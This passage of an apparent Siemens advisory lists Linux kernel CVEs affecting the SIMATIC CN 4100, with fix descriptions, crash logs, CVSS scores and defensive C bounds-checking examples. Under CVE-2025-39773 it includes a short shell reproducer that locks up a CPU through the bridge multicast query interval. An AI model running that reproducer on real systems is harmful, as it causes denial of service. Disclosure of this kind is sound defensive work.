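            hlen = ((size_t)pkt[off + 1] + 1) * 8;  /* 8-octet units (RFC 8200) */
        if (len - off < hlen)
            return false;                           /* header runs past the buffer */
        nexthdr = pkt[off];
        off += hlen;
        count++;
    }
}

/* The NETIF_F_IPV6_CSUM contract, simplified: hardware checksum only for
 * plain TCP or UDP directly after the IPv6 header; anything else (including
 * a malformed chain) is computed in software. */
bool ipv6_csum_offload_allowed(const uint8_t *pkt, size_t len, size_t ip6off)
{
    struct ipv6_walk w;

    if (!ipv6_walk_ext_hdrs(pkt, len, ip6off, &w) || w.ext_count != 0)
        return false;
    return w.l4proto == IP6_NH_TCP || w.l4proto == IP6_NH_UDP;
}

int main(void)
{
    struct ipv6_walk outer, inner;

    if (!ipv6_walk_ext_hdrs(skb_dump, sizeof skb_dump, ETH_HLEN, &outer))
        return 1;
    printf("outer: %d ext hdr(s), next proto %u, offload %s\n", outer.ext_count,
           outer.l4proto, ipv6_csum_offload_allowed(skb_dump, sizeof skb_dump, ETH_HLEN)
           ? "allowed" : "masked");
    if (outer.l4proto == IP6_NH_GRE) {              /* flag-less GRE header is 4 bytes */
        size_t inner_off = outer.l4off + 4;
        if (ipv6_walk_ext_hdrs(skb_dump, sizeof skb_dump, inner_off, &inner))
            printf("inner: %d ext hdr(s), next proto %u, offload %s\n", inner.ext_count,
                   inner.l4proto, ipv6_csum_offload_allowed(skb_dump, sizeof skb_dump, inner_off)
                   ? "allowed" : "masked");
    }
    return 0;
}
```

On the captured frame the outer walk reports one extension header (Destination Options, which here carries a Tunnel Encapsulation Limit option) followed by GRE, and the inner walk reports none followed by TCP; the same walker rejects the frame if it is cut short inside the options header, which is why the decision function treats a failed walk the same as an extension header.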
kernel log output (truncated):

  WARNING: CPU: 1 PID: 5273 at net/core/dev.c:3535 skb_warn_bad_offload+0x81/0x140
  ...
  Call Trace:
   skb_checksum_help+0x12a/0x1f0
   validate_xmit_skb+0x1a3/0x2d0
   validate_xmit_skb_list+0x4f/0x80
   sch_direct_xmit+0x1a2/0x380
   __dev_xmit_skb+0x242/0x670
   __dev_queue_xmit+0x3fc/0x7f0
   ip6_finish_output2+0x25e/0x5d0
   ip6_finish_output+0x1fc/0x3f0
   ip6_tnl_xmit+0x608/0xc00 [ip6_tunnel]
   ip6gre_tunnel_xmit+0x1c0/0x390 [ip6_gre]
   dev_hard_start_xmit+0x63/0x1c0
   __dev_queue_xmit+0x6d0/0x7f0
   ip6_finish_output2+0x214/0x5d0
   ip6_finish_output+0x1fc/0x3f0
   ip6_xmit+0x2ca/0x6f0
   ip6_finish_output+0x1fc/0x3f0
   ip6_xmit+0x2ca/0x6f0
   inet6_csk_xmit+0xeb/0x150
   __tcp_transmit_skb+0x555/0xa80
   tcp_write_xmit+0x32a/0xe90
   tcp_sendmsg_locked+0x437/0x1110
   tcp_sendmsg+0x2f/0x50
  ...
  skb linear: 00000000: e4 3d 1a 7d ec 30 e4 3d 1a 7e 5d 90 86 dd 60 0e
  skb linear: 00000010: 00 0a 1b 34 3c 40 20 11 00 00 00 00 00 00 00 00
  skb linear: 00000020: 00 00 00 00 00 12 20 11 00 00 00 00 00 00 00 00
  skb linear: 00000030: 00 00 00 00 00 11 2f 00 04 01 04 01 01 00 00 00
  skb linear: 00000040: 86 dd 60 0e 00 0a 1b 00 06 40 20 23 00 00 00 00
  skb linear: 00000050: 00 00 00 00 00 00 00 00 00 12 20 23 00 00 00 00
  skb linear: 00000060: 00 00 00 00 00 00 00 00 00 11 bf 96 14 51 13 f9
  skb linear: 00000070: ae 27 a0 a8 2b e3 80 18 00 40 5b 6f 00 00 01 01
  skb linear: 00000080: 08 0a 42 d4 50 d5 4b 70 f8 1a

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-573 Improper Following of Specification by Caller
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39772
In the Linux kernel, the following vulnerability has been resolved:

drm/hisilicon/hibmc: fix the hibmc loaded failed bug

When hibmc loading fails, the driver uses hibmc_unload to free the resources, but the mutexes in mode.config are not initialized, so this accesses a NULL pointer. Just change the goto statement to a return, because hibmc_hw_init() doesn't need to free anything.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39773
In the Linux kernel, the following vulnerability has been resolved:

net: bridge: fix soft lockup in br_multicast_query_expired()

When multicast_query_interval is set to a large value, the local variable 'time' in br_multicast_send_query() may overflow. If the time is smaller than jiffies, the timer will expire immediately and then call mod_timer() again, which creates a loop and may trigger the following soft lockup issue.

  watchdog: BUG: soft lockup - CPU#1 stuck for 221s! [rb_consumer:66]
  CPU: 1 UID: 0 PID: 66 Comm: rb_consumer Not tainted 6.16.0+ #259 PREEMPT(none)
  Call Trace:
   __netdev_alloc_skb+0x2e/0x3a0
   br_ip6_multicast_alloc_query+0x212/0x1b70
   __br_multicast_send_query+0x376/0xac0
   br_multicast_send_query+0x299/0x510
   br_multicast_query_expired.constprop.0+0x16d/0x1b0
   call_timer_fn+0x3b/0x2a0
   __run_timers+0x619/0x950
   run_timer_softirq+0x11c/0x220
   handle_softirqs+0x18e/0x560
   __irq_exit_rcu+0x158/0x1a0
   sysvec_apic_timer_interrupt+0x76/0x90

This issue can be reproduced with:

  ip link add br0 type bridge
  echo 1 > /sys/class/net/br0/bridge/multicast_querier
  echo 0xffffffffffffffff > /sys/class/net/br0/bridge/multicast_query_interval
  ip link set dev br0 up

The multicast_startup_query_interval can also cause this issue.

Similar to the commit 99b40610956a ("net: bridge: mcast: add and enforce query interval minimum"), add a check for the query interval maximum to fix this issue.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39776
In the Linux kernel, the following vulnerability has been resolved:

mm/debug_vm_pgtable: clear page table entries at destroy_args()

The mm/debug_vm_pagetable test manually allocates page table entries for the tests it runs, also using its own manually allocated mm_struct. That in itself is ok, but when it exits, at destroy_args(), it fails to clear those entries with the *_clear functions.

The problem is that this leaves stale entries. If another process allocates an mm_struct with a pgd at the same address, it may end up running into the stale entry. This is happening in practice on a debug kernel with CONFIG_DEBUG_VM_PGTABLE=y; for example, this is the output with some extra debugging I added (it prints a warning trace if pgtables_bytes goes negative, in addition to the warning at the check_mm() function):

  [ 2.539353] debug_vm_pgtable: [get_random_vaddr ]: random_vaddr is 0x7ea247140000
  [ 2.539366] kmem_cache info
  [ 2.539374] kmem_cachep 0x000000002ce82385 - freelist 0x0000000000000000 - offset 0x508
  [ 2.539447] debug_vm_pgtable: [init_args ]: args->mm is 0x000000002267cc9e
  (...)
  [ 2.552800] WARNING: CPU: 5 PID: 116 at include/linux/mm.h:2841 free_pud_range+0x8bc/0x8d0
  [ 2.552816] Modules linked in:
  [ 2.552843] CPU: 5 UID: 0 PID: 116 Comm: modprobe Not tainted 6.12.0-105.debug_vm2.el10.ppc64le+debug #1 VOLUNTARY
  [ 2.552859] Hardware name: IBM,9009-41A POWER9 (architected) 0x4e0202 0xf000005 of:IBM,FW910.00 (VL910_062) hv:phyp pSeries
  [ 2.552872] NIP: c0000000007eef3c LR: c0000000007eef30 CTR: c0000000003d8c90
  [ 2.552885] REGS: c0000000622e73b0 TRAP: 0700 Not tainted (6.12.0-105.debug_vm2.el10.ppc64le+debug)
  [ 2.552899] MSR: 800000000282b033 CR: 24002822 XER: 0000000a
  [ 2.552954] CFAR: c0000000008f03f0 IRQMASK: 0
  [ 2.552954] GPR00: c0000000007eef30 c0000000622e7650 c000000002b1ac00 0000000000000001
  [ 2.552954] GPR04: 0000000000000008 0000000000000000 c0000000007eef30 ffffffffffffffff
  [ 2.552954] GPR08: 00000000ffff00f5 0000000000000001 0000000000000048 0000000000004000
  [ 2.552954] GPR12: 00000003fa440000 c000000017ffa300 c0000000051d9f80 ffffffffffffffdb
  [ 2.552954] GPR16: 0000000000000000 0000000000000008 000000000000000a 60000000000000e0
  [ 2.552954] GPR20: 4080000000000000 c0000000113af038 00007fffcf130000 0000700000000000
  [ 2.552954] GPR24: c000000062a6a000 0000000000000001 8000000062a68000 0000000000000001
  [ 2.552954] GPR28: 000000000000000a c000000062ebc600 0000000000002000 c000000062ebc760
  [ 2.553170] NIP [c0000000007eef3c] free_pud_range+0x8bc/0x8d0
  [ 2.553185] LR [c0000000007eef30] free_pud_range+0x8b0/0x8d0
  [ 2.553199] Call Trace:
  [ 2.553207] [c0000000622e7650] [c0000000007eef30] free_pud_range+0x8b0/0x8d0 (unreliable)
  [ 2.553229] [c0000000622e7750] [c0000000007f40b4] free_pgd_range+0x284/0x3b0
  [ 2.553248] [c0000000622e7800] [c0000000007f4630] free_pgtables+0x450/0x570
  [ 2.553274] [c0000000622e78e0] [c0000000008161c0] exit_mmap+0x250/0x650
  [ 2.553292] [c0000000622e7a30] [c0000000001b95b8] __mmput+0x98/0x290
  [ 2.558344] [c0000000622e7a80] [c0000000001d1018] exit_mm+0x118/0x1b0
  [ 2.558361] [c0000000622e7ac0] [c0000000001d141c] do_exit+0x2ec/0x870
  [ 2.558376] [c0000000622e7b60] [c0000000001d1ca8] do_group_exit+0x88/0x150
  [ 2.558391] [c0000000622e7bb0] [c0000000001d1db8] sys_exit_group+0x48/0x50
  [ 2.558407] [c0000000622e7be0] [c00000000003d810] system_call_exception+0x1e0/0x4c0
  [ 2.558423] [c0000000622e7e50] [c00000000000d05c] system_call_vectored_common+0x15c/0x2ec
  (...)
  [ 2.558892] ---[ end trace 0000000000000000 ]---
  [ 2.559022] BUG: Bad rss-counter state mm:000000002267cc9e type:MM_ANONPAGES val:1
  [ 2.559037] BUG: non-zero pgtables_bytes on freeing mm: -6144

Here the modprobe process ended up with an allocated mm_struct from the mm_struct slab that was used before by the debug_vm_pgtable test. That is not a problem, since the mm_stru
---truncated---

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39782
In the Linux kernel, the following vulnerability has been resolved:

jbd2: prevent softlockup in jbd2_log_do_checkpoint()

Both jbd2_log_do_checkpoint() and jbd2_journal_shrink_checkpoint_list() periodically release j_list_lock after processing a batch of buffers to avoid long hold times on the j_list_lock. However, since both functions contend for j_list_lock, the combined time spent waiting and processing can be significant.

jbd2_journal_shrink_checkpoint_list() explicitly calls cond_resched() when need_resched() is true to avoid softlockups during prolonged operations. But jbd2_log_do_checkpoint() only exits its loop when need_resched() is true, relying on potentially sleeping functions like __flush_batch() or wait_on_buffer() to trigger rescheduling. If those functions do not sleep, the kernel may hit a softlockup.

  watchdog: BUG: soft lockup - CPU#3 stuck for 156s! [kworker/u129:2:373]
  CPU: 3 PID: 373 Comm: kworker/u129:2 Kdump: loaded Not tainted 6.6.0+ #10
  Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.27 06/13/2017
  Workqueue: writeback wb_workfn (flush-7:2)
  pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
  pc : native_queued_spin_lock_slowpath+0x358/0x418
  lr : jbd2_log_do_checkpoint+0x31c/0x438 [jbd2]
  Call trace:
   native_queued_spin_lock_slowpath+0x358/0x418
   jbd2_log_do_checkpoint+0x31c/0x438 [jbd2]
   __jbd2_log_wait_for_space+0xfc/0x2f8 [jbd2]
   add_transaction_credits+0x3bc/0x418 [jbd2]
   start_this_handle+0xf8/0x560 [jbd2]
   jbd2__journal_start+0x118/0x228 [jbd2]
   __ext4_journal_start_sb+0x110/0x188 [ext4]
   ext4_do_writepages+0x3dc/0x740 [ext4]
   ext4_writepages+0xa4/0x190 [ext4]
   do_writepages+0x94/0x228
   __writeback_single_inode+0x48/0x318
   writeback_sb_inodes+0x204/0x590
   __writeback_inodes_wb+0x54/0xf8
   wb_writeback+0x2cc/0x3d8
   wb_do_writeback+0x2e0/0x2f8
   wb_workfn+0x80/0x2a8
   process_one_work+0x178/0x3e8
   worker_thread+0x234/0x3b8
   kthread+0xf0/0x108
   ret_from_fork+0x10/0x20

So explicitly call cond_resched() in jbd2_log_do_checkpoint() to avoid the softlockup.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39783
In the Linux kernel, the following vulnerability has been resolved:

PCI: endpoint: Fix configfs group list head handling

Doing a list_del() on the epf_group field of struct pci_epf_driver in pci_epf_remove_cfs() is not correct as this field is a list head, not a list entry. This list_del() call triggers a KASAN warning when an endpoint function driver which has a configfs attribute group is torn down:

  ==================================================================
  BUG: KASAN: slab-use-after-free in pci_epf_remove_cfs+0x17c/0x198
  Write of size 8 at addr ffff00010f4a0d80 by task rmmod/319

  CPU: 3 UID: 0 PID: 319 Comm: rmmod Not tainted 6.16.0-rc2 #1 NONE
  Hardware name: Radxa ROCK 5B (DT)
  Call trace:
   show_stack+0x2c/0x84 (C)
   dump_stack_lvl+0x70/0x98
   print_report+0x17c/0x538
   kasan_report+0xb8/0x190
   __asan_report_store8_noabort+0x20/0x2c
   pci_epf_remove_cfs+0x17c/0x198
   pci_epf_unregister_driver+0x18/0x30
   nvmet_pci_epf_cleanup_module+0x24/0x30 [nvmet_pci_epf]
   __arm64_sys_delete_module+0x264/0x424
   invoke_syscall+0x70/0x260
   el0_svc_common.constprop.0+0xac/0x230
   do_el0_svc+0x40/0x58
   el0_svc+0x48/0xdc
   el0t_64_sync_handler+0x10c/0x138
   el0t_64_sync+0x198/0x19c
  ...

Remove this incorrect list_del() call from pci_epf_remove_cfs().

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
CVSS 3.1 base score: 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39787
In the Linux kernel, the following vulnerability has been resolved:

soc: qcom: mdt_loader: Ensure we don't read past the ELF header

When the MDT loader is used in remoteproc, the ELF header is sanitized beforehand, but that's not necessarily the case for other clients.

Validate the size of the firmware buffer to ensure that we don't read past the end as we iterate over the header. e_phentsize and e_shentsize are validated as well, to ensure that the assumptions about step size in the traversal are valid.
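The check the mdt_loader fix describes, as an added example (written for this page, not the driver's code): before iterating over the program header table of an untrusted ELF firmware image, confirm that the table lies inside the buffer and that e_phentsize matches the structure the loop will step by, so that a hostile header cannot make the walk read past the end or land between entries. The minimal ELF32 structures follow the ELF specification's layout; the mdt_check result codes, mdt_validate_phdrs and the build_sample_elf() helper that constructs a test image are this example's own, and only e_phentsize is covered here (the kernel fix validates e_shentsize the same way).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal ELF32 layouts (field order and widths per the ELF specification),
 * kept local so the example does not depend on <elf.h>. */
#define EI_NIDENT 16
static const uint8_t ELF_MAGIC[4] = { 0x7f, 'E', 'L', 'F' };

struct elf32_hdr {
    uint8_t  e_ident[EI_NIDENT];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
};

struct elf32_phdr {
    uint32_t p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align;
};

enum mdt_check {
    MDT_OK = 0,
    MDT_TOO_SHORT,       /* buffer smaller than the ELF header itself */
    MDT_BAD_MAGIC,
    MDT_BAD_PHENTSIZE,   /* traversal step size would not match the struct */
    MDT_PHDRS_PAST_END,  /* program header table runs past the buffer */
};

/* Decide whether walking the program header table can stay inside fw_size
 * bytes. Operands are checked before the multiplication and the comparison
 * is against the remaining bytes, so e_phoff + e_phnum * e_phentsize can
 * never wrap. */
enum mdt_check mdt_validate_phdrs(const uint8_t *fw, size_t fw_size)
{
    struct elf32_hdr eh;

    if (fw_size < sizeof eh)
        return MDT_TOO_SHORT;
    memcpy(&eh, fw, sizeof eh);                 /* firmware buffer may be unaligned */
    if (memcmp(eh.e_ident, ELF_MAGIC, sizeof ELF_MAGIC) != 0)
        return MDT_BAD_MAGIC;
    if (eh.e_phentsize != sizeof(struct elf32_phdr))
        return MDT_BAD_PHENTSIZE;

    size_t table = (size_t)eh.e_phnum * eh.e_phentsize;   /* uint16 * uint16 fits */
    if (eh.e_phoff > fw_size || table > fw_size - eh.e_phoff)
        return MDT_PHDRS_PAST_END;
    return MDT_OK;
}

#define SAMPLE_PHNUM 2
#define SAMPLE_SIZE  (sizeof(struct elf32_hdr) + SAMPLE_PHNUM * sizeof(struct elf32_phdr))

/* Fill buf (SAMPLE_SIZE bytes) with a constructed image: one ELF32 header
 * followed by zeroed program headers. Header fields are written in host byte
 * order, which is what the memcpy-based read above assumes (a kernel loader
 * runs in the target's own byte order). */
void build_sample_elf(uint8_t *buf, uint16_t phnum, uint16_t phentsize, uint32_t phoff)
{
    struct elf32_hdr eh;

    memset(buf, 0, SAMPLE_SIZE);
    memset(&eh, 0, sizeof eh);
    memcpy(eh.e_ident, ELF_MAGIC, sizeof ELF_MAGIC);
    eh.e_ident[4] = 1;                          /* ELFCLASS32 */
    eh.e_ident[5] = 1;                          /* ELFDATA2LSB */
    eh.e_type = 2;                              /* ET_EXEC */
    eh.e_ehsize = (uint16_t)sizeof eh;
    eh.e_phoff = phoff;
    eh.e_phentsize = phentsize;
    eh.e_phnum = phnum;
    memcpy(buf, &eh, sizeof eh);
}

int main(void)
{
    uint8_t img[SAMPLE_SIZE];
    uint16_t ent = sizeof(struct elf32_phdr);
    uint32_t off = sizeof(struct elf32_hdr);

    build_sample_elf(img, SAMPLE_PHNUM, ent, off);
    printf("well-formed image: %d\n", mdt_validate_phdrs(img, SAMPLE_SIZE));
    build_sample_elf(img, SAMPLE_PHNUM + 1, ent, off);
    printf("one phdr too many: %d\n", mdt_validate_phdrs(img, SAMPLE_SIZE));
    build_sample_elf(img, 1, ent, 0xfffffff0u);
    printf("e_phoff near UINT32_MAX: %d\n", mdt_validate_phdrs(img, SAMPLE_SIZE));
    return 0;
}
```

The e_phoff case is the one a 32-bit addition would get wrong: e_phoff + e_phnum * e_phentsize wraps to a small number and passes a naive "end <= size" test, while comparing the table size against fw_size - e_phoff (after confirming e_phoff <= fw_size) cannot wrap.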
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39788 In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: exynos: Fix programming of HCI_UTRL_NEXUS_TYPE On Google gs101, the number of UTP transfer request slots (nutrs) is 32, and in this case the driver ends up programming the UTRL_NEXUS_TYPE incorrectly as 0. This is because the left hand side of the shift is 1, which is of type int, i.e. 31 bits wide. Shifting by more than that width results in undefined behaviour. Fix this by switching to the BIT() macro, which applies correct type casting as required. This ensures the correct value is written to UTRL_NEXUS_TYPE (0xffffffff on gs101), and it also fixes a UBSAN shift warning: UBSAN: shift-out-of-bounds in drivers/ufs/host/ufs-exynos.c:1113:21 shift exponent 32 is too large for 32-bit type 'int' For consistency, apply the same change to the nutmrs / UTMRL_NEXUS_TYPE write. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39790 In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Detect events pointing to unexpected TREs When a remote device sends a completion event to the host, it contains a pointer to the consumed TRE. 
The host uses this pointer to process all of the TREs between it and the host's local copy of the ring's read pointer. This works when processing completion for chained transactions, but can lead to nasty results if the device sends an event for a single-element transaction with a read pointer that is multiple elements ahead of the host's read pointer. For instance, if the host accesses an event ring while the device is updating it, the pointer inside of the event might still point to an old TRE. If the host uses the channel's xfer_cb() to directly free the buffer pointed to by the TRE, the buffer will be double-freed. This behavior was observed on an ep that used upstream EP stack without 'commit 6f18d174b73d ("bus: mhi: ep: Update read pointer only after buffer is written")'. Where the device updated the events ring pointer before updating the event contents, so it left a window where the host was able to access the stale data the event pointed to, before the device had the chance to update them. The usual pattern was that the host received an event pointing to a TRE that is not immediately after the last processed one, so it got treated as if it was a chained transaction, processing all of the TREs in between the two read pointers. This commit aims to harden the host by ensuring transactions where the event points to a TRE that isn't local_rp + 1 are chained. 
[mani: added stable tag and reworded commit message] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-415 Double Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2025-39794 In the Linux kernel, the following vulnerability has been resolved: ARM: tegra: Use I/O memcpy to write to IRAM Kasan crashes the kernel trying to check boundaries when using the normal memcpy. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2025-39795 In the Linux kernel, the following vulnerability has been resolved: block: avoid possible overflow for chunk_sectors check in blk_stack_limits() In blk_stack_limits(), we check that the t->chunk_sectors value is a multiple of the t->physical_block_size value. However, by finding the chunk_sectors value in bytes, we may overflow the unsigned int which holds chunk_sectors, so change the check to be based on sectors. 
Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-674 Uncontrolled Recursion
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39798
In the Linux kernel, the following vulnerability has been resolved:

NFS: Fix the setting of capabilities when automounting a new filesystem

Capabilities cannot be inherited when we cross into a new filesystem. They need to be reset to the minimal defaults, and then probed for again.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-273 Improper Check for Dropped Privileges
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39800
In the Linux kernel, the following vulnerability has been resolved:

btrfs: abort transaction on unexpected eb generation at btrfs_copy_root()

If we find an unexpected generation for the extent buffer we are cloning at btrfs_copy_root(), we just WARN_ON() and don't error out and abort the transaction, meaning we allow to persist metadata with an unexpected generation. Instead of warning only, abort the transaction and return -EUCLEAN.
Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39801
In the Linux kernel, the following vulnerability has been resolved:

usb: dwc3: Remove WARN_ON for device endpoint command timeouts

This commit addresses a rarely observed endpoint command timeout which causes kernel panic due to warn when 'panic_on_warn' is enabled and unnecessary call trace prints when 'panic_on_warn' is disabled. It is seen during fast software-controlled connect/disconnect testcases. The following is one such endpoint command timeout that we observed:

1. Connect
=======
->dwc3_thread_interrupt
->dwc3_ep0_interrupt
->configfs_composite_setup
->composite_setup
->usb_ep_queue
->dwc3_gadget_ep0_queue
->__dwc3_gadget_ep0_queue
->__dwc3_ep0_do_control_data
->dwc3_send_gadget_ep_cmd

2. Disconnect
==========
->dwc3_thread_interrupt
->dwc3_gadget_disconnect_interrupt
->dwc3_ep0_reset_state
->dwc3_ep0_end_control_data
->dwc3_send_gadget_ep_cmd

In the issue scenario, in Exynos platforms, we observed that control transfers for the previous connect have not yet been completed and end transfer command sent as a part of the disconnect sequence and processing of USB_ENDPOINT_HALT feature request from the host timeout. This may be an expected scenario since the controller is processing EP commands sent as a part of the previous connect. It may be better to remove WARN_ON in all places where device endpoint commands are sent to avoid unnecessary kernel panic due to warn.
Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39806
In the Linux kernel, the following vulnerability has been resolved:

HID: multitouch: fix slab out-of-bounds access in mt_report_fixup()

A malicious HID device can trigger a slab out-of-bounds during mt_report_fixup() by passing in a report descriptor smaller than 607 bytes. mt_report_fixup() attempts to patch byte offset 607 of the descriptor with 0x25 by first checking if byte offset 607 is 0x15; however, it lacks bounds checks to verify if the descriptor is big enough before conducting this check. Fix this bug by ensuring the descriptor size is at least 608 bytes before accessing it.
Below is the KASAN splat after the out of bounds access happens:

[ 13.671954] ==================================================================
[ 13.672667] BUG: KASAN: slab-out-of-bounds in mt_report_fixup+0x103/0x110
[ 13.673297] Read of size 1 at addr ffff888103df39df by task kworker/0:1/10
[ 13.673297]
[ 13.673297] CPU: 0 UID: 0 PID: 10 Comm: kworker/0:1 Not tainted 6.15.0-00005-gec5d573d83f4-dirty #3
[ 13.673297] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/04
[ 13.673297] Call Trace:
[ 13.673297]
[ 13.673297] dump_stack_lvl+0x5f/0x80
[ 13.673297] print_report+0xd1/0x660
[ 13.673297] kasan_report+0xe5/0x120
[ 13.673297] __asan_report_load1_noabort+0x18/0x20
[ 13.673297] mt_report_fixup+0x103/0x110
[ 13.673297] hid_open_report+0x1ef/0x810
[ 13.673297] mt_probe+0x422/0x960
[ 13.673297] hid_device_probe+0x2e2/0x6f0
[ 13.673297] really_probe+0x1c6/0x6b0
[ 13.673297] __driver_probe_device+0x24f/0x310
[ 13.673297] driver_probe_device+0x4e/0x220
[ 13.673297] __device_attach_driver+0x169/0x320
[ 13.673297] bus_for_each_drv+0x11d/0x1b0
[ 13.673297] __device_attach+0x1b8/0x3e0
[ 13.673297] device_initial_probe+0x12/0x20
[ 13.673297] bus_probe_device+0x13d/0x180
[ 13.673297] device_add+0xe3a/0x1670
[ 13.673297] hid_add_device+0x31d/0xa40
[...]

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39808
In the Linux kernel, the following vulnerability has been resolved:

HID: hid-ntrig: fix unable to handle page fault in ntrig_report_version()

In ntrig_report_version(), the hdev parameter is passed from hid_probe().
Sending a descriptor to /dev/uhid can make hdev->dev.parent->parent null. If hdev->dev.parent->parent is null, usb_dev has an invalid address (0xffffffffffffff58) that hid_to_usb_dev(hdev) returned; when usb_rcvctrlpipe() uses usb_dev, it triggers a page fault error for address 0xffffffffffffff58.

Add null check logic to ntrig_report_version() before calling hid_to_usb_dev().

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39812
In the Linux kernel, the following vulnerability has been resolved:

sctp: initialize more fields in sctp_v6_from_sk()

syzbot found that sin6_scope_id was not properly initialized, leading to undefined behavior. Clear sin6_scope_id and sin6_flowinfo.
